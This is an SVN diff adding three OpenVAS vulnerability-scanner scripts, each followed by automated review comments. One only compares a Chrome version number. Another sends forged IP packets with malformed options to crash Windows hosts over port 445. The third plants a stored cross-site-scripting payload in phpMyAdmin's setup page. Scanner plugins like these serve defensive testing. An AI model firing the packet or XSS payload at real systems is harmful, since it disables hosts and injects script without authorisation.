+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3900");
+ script_bugtraq_id(50701);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-21 17:153:15 +0530 (Mon, 21 Nov 2011)");
+ script_name("Google Chrome V8 Remote Code Execution Vulnerability (Windows)");
+ desc = "
+ Overview: The host is installed with Google Chrome and is prone to remote
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to an out-of-bounds write operation error in V8
+ (JavaScript engine) causing memory corruption.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code,
+ cause a denial of service.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Google Chrome version prior to 15.0.874.121 on Windows
+
+ Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+ For updates refer, http://www.google.com/chrome
+
+ References:
+ http://osvdb.org/show/osvdb/77193
+ http://secunia.com/advisories/46889/
+ http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+ script_description(desc);
+ script_summary("Check the version of Google Chrome");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("General");
+ script_dependencies("gb_google_chrome_detect_win.nasl");
+ script_require_keys("GoogleChrome/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
+if(!chromeVer){
+ exit(0);
+}
+
+## Check for Google Chrome Versions prior to 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+ security_hole(0);
+}
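Review bot: The creation_date at L720 is malformed — `17:153:15` is not a valid time — so any consumer that parses this tag will reject or mis-order the script. Replace it with the timestamp from the $Id line at L687: `script_tag(name:"creation_date", value:"2011-11-21 17:12:14 +0530 (Mon, 21 Nov 2011)");`. The $Id line itself also lacks the trailing `Z` that L781 and L298 carry.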
Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,136 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ms_windows_ip_validation_code_exec_vuln.nasl 18523 2011-11-21 15:15:15Z nov $
+#
+# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902588);
+ script_version("$Revision$");
+ script_cve_id("CVE-2005-0048");
+ script_bugtraq_id(13116);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)");
+ script_name("Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability");
+ desc = "
+ Overview: The host is running Microsoft Windows and is prone to remote code
+ execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to insufficient validation of IP options and can be
+ exploited to cause a vulnerable system to stop responding and restart or may
+ allow execution of arbitrary code by sending a specially crafted IP packet
+ to a vulnerable system.
+
+ Impact:
+ Successful exploitation will let the attacker to cause a denial of service
+ and possibly execute arbitrary code via crafted IP packets with malformed
+ options.
+
+ Impact Level: System
+
+ Affected Software/OS:
+ Microsoft Windows XP SP2 and prior.
+ Microsoft Windows 2000 Server SP4 and prior.
+
+ Run Windows Update and update the listed hotfixes or download and
+ update mentioned hotfixes in the advisory from the below link,
+ http://technet.microsoft.com/en-us/security/bulletin/ms05-019
+
+ References:
+ http://secunia.com/advisories/14512
+ http://securitytracker.com/id/1013686
+ http://technet.microsoft.com/en-us/security/bulletin/ms05-019 ";
+
+ script_description(desc);
+ script_summary("Determine Internet Protocol Validation Remote Code Execution Vulnerability");
+ script_category(ACT_KILL_HOST);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Windows : Microsoft Bulletins");
+ script_require_ports(139, 445);
+ exit(0);
+}
+
+
+include("smb_nt.inc");
+
+if(TARGET_IS_IPV6()){
+ exit(0);
+}
+
+## Get SMB Port
+port = kb_smb_transport();
+if(!port) {
+ port = 445;
+}
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Building Exploit
+dstaddr = get_host_ip();
+srcaddr = this_host();
+sport = rand() % (65536 - 1024) + 1024;
+
+## IP packet with an option size 39
+options = raw_string(0x03, 0x27, crap(data:"G", length:38));
+
+ip = forge_ip_packet( ip_v : 4,
+ ip_hl : 15,
+ ip_tos : 0,
+ ip_len : 20,
+ ip_id : rand(),
+ ip_p : IPPROTO_TCP,
+ ip_ttl : 64,
+ ip_off : 0,
+ ip_src : srcaddr,
+ data : options );
+
+
+tcp = forge_tcp_packet( ip : ip,
+ th_sport : sport,
+ th_dport : port,
+ th_flags : TH_SYN,
+ th_seq : rand(),
+ th_ack : 0,
+ th_x2 : 0,
+ th_off : 5,
+ th_win : 512,
+ th_urp : 0 );
+
+## Sending Exploit
+start_denial();
+for( i = 0; i < 5 ; i ++ ) {
+ result = send_packet(tcp,pcap_active:FALSE);
+}
+alive = end_denial();
+
+## Confirm Host is Still Alive and Responding
+if(! alive) {
+ security_hole(port);
+}
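Review bot: Nothing before `start_denial();` establishes that the target is one of the affected releases named in the description (Windows XP SP2 / 2000 SP4 and prior) — the only gate is that the SMB port is open — so this ACT_KILL_HOST test sends its crafted packets at any host with 445 reachable and reports `security_hole(port)` for any host that stops answering during the five sends, whatever the cause. The script also declares no `script_dependencies`, so no OS fingerprint is guaranteed to be in the KB; adding the SMB/OS detection script as a dependency and guarding with something like `if(!get_kb_item("SMB/WindowsVersion")) exit(0);` (ideally restricted to the listed versions) would reduce both collateral impact and false positives. `result` in the send loop is assigned but never read and can be dropped. The remediation paragraph starting `Run Windows Update and update the listed hotfixes` lacks the `Fix:` label the other plugins in this commit use in their desc blocks.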
Property changes on: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date
Added: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl 2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl 2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,172 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_phpmyadmin_setup_interface_xss_vuln.nasl 18295 2011-11-22 17:17:17Z nov $
+#
+# phpMyAdmin Setup Interface Cross Site Scripting Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902585);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-4064");
+ script_bugtraq_id(50175);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-22 17:17:17 +0530 (Tue, 22 Nov 2011)");
+ script_name("phpMyAdmin Setup Interface Cross Site Scripting Vulnerability");
+ desc = "
+ Overview: The host is running phpMyAdmin and is prone to cross-site scripting
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to improper validation of user-supplied input
+ via the 'Servers-0-verbose' parameter to setup/index.php, which allows
+ attackers to execute arbitrary HTML and script code in a user's browser
+ session in the context of an affected site.
+
+ Impact:
+ Successful exploitation will allow remote attackers to insert arbitrary HTML
+ and script code, which will be executed in a user's browser session in the
+ context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ phpMyAdmin versions 3.4.x before 3.4.6
+
+ Fix: Upgrade to phpMyAdmin version 3.4.6 or later,
+ For updates refer, http://www.phpmyadmin.net/home_page/downloads.php
+
+ References:
+ http://osvdb.org/show/osvdb/76711
+ http://secunia.com/advisories/46431
+ http://securitytracker.com/id/1026199
+ http://xforce.iss.net/xforce/xfdb/70681
+ http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php
+ http://hauntit.blogspot.com/2011/09/stored-xss-in-phpmyadmin-345-all.html ";
+
+ script_description(desc);
+ script_summary("Check if phpMyAdmin is vulnerable to Cross-Site Scripting");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 SecPod");
+ script_family("Web application abuses");
+ script_dependencies("secpod_phpmyadmin_detect_900129.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+ exit(0);
+}
+
+## Get phpMyAdmin Location
+if(!dir = get_dir_from_kb(port:port, app:"phpMyAdmin")){
+ exit(0);
+}
+
+## Send and Receive the response
+url = "/setup/index.php?tab_hash=&check_page_refresh=1&page=servers&mode=" +
+ "add&submit=New+server";
+req = http_get(item:dir+url, port:port);
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Get Session ID
+cookie = eregmatch(pattern:"Set-Cookie: ([^;]*);", string:res);
+if(isnull(cookie[1])) {
+ exit(0);
+}
+cookie = cookie[1];
+
+## Get Token
+token = eregmatch(pattern:'name="token" value="([a-zA-Z0-9]+)"', string:res);
+if(isnull(token[1])) {
+ exit(0);
+}
+token = token[1];
+
+## Construct attack request
+data = string("tab_hash=&check_page_refresh=1&token=", token, "&Servers-0-",
+ "verbose=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E",
+ "&Servers-0-host=localhost&Servers-0-port=&Servers-0-socket=&S",
+ "ervers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_s",
+ "ave=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Serve",
+ "rs-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_h",
+ "ttp_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Serv",
+ "ers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userpre",
+ "fs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-al",
+ "low=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-",
+ "0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowD",
+ "atabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-con",
+ "troluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&S",
+ "ervers-0-bookmarktable=&Servers-0-relation=&Servers-0-usercon",
+ "fig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-h",
+ "istory=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0",
+ "-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_def",
+ "ault_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CREN",
+ "AME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDEL",
+ "ETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VI",
+ "EW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers",
+ "-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_tabl",
+ "e=on&Servers-0-tracking_add_drop_database=on");
+
+url = string(dir, '/setup/index.php?tab_hash=&check_page_refresh=1',
+ '&token=', token, '&page=servers&mode=add&submit=New+server');
+
+req = string("POST ", url, " HTTP/1.1\r\n",
+ "Host: ", get_host_name(), "\r\n",
+ "User-Agent: OpenVAS\r\n",
+ "Cookie: ", cookie, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(data), "\r\n\r\n", data);
+
+## Send crafted POST request and receive the response
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit
+if(res =~ "HTTP/1.. 30")
+{
+ ## Send request and receive the response
+ req = http_get(item:string(dir,"/setup/index.php"), port:port);
+ req = string(chomp(req), '\r\nCookie: ', cookie, '\r\n\r\n');
+ res = http_keepalive_send_recv(port:port, data:req);
+
+ ## Confirm exploit worked by checking the response
+ if("Use SSL (<script>alert(document.cookie)</script>)" >< res){
+ security_warning(port);
+ }
+}
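Review bot: The condition `if(res =~ "HTTP/1.. 30")` accepts any 3xx response as evidence that the server entry was saved, including a redirect back to the form or to a login page, so the confirmation GET is issued even when nothing was stored; the string match on the second response keeps the final verdict correct, but the intermediate check would be more meaningful if it also required the Location to point at setup/index.php. The `version_func.inc` include is not used anywhere in this script and can be removed. The POST with `submit_save=Save` adds a server entry carrying the script payload to the target's setup session — presumably it persists until that session expires — and a comment at `## Construct attack request` stating that side effect would help operators understand what this ACT_ATTACK test leaves behind. The cookie extraction takes the first `Set-Cookie` header only; if the setup page ever sets more than one cookie this may not be the session cookie, which is worth a brief note beside `## Get Session ID`.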
Property changes on: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision Date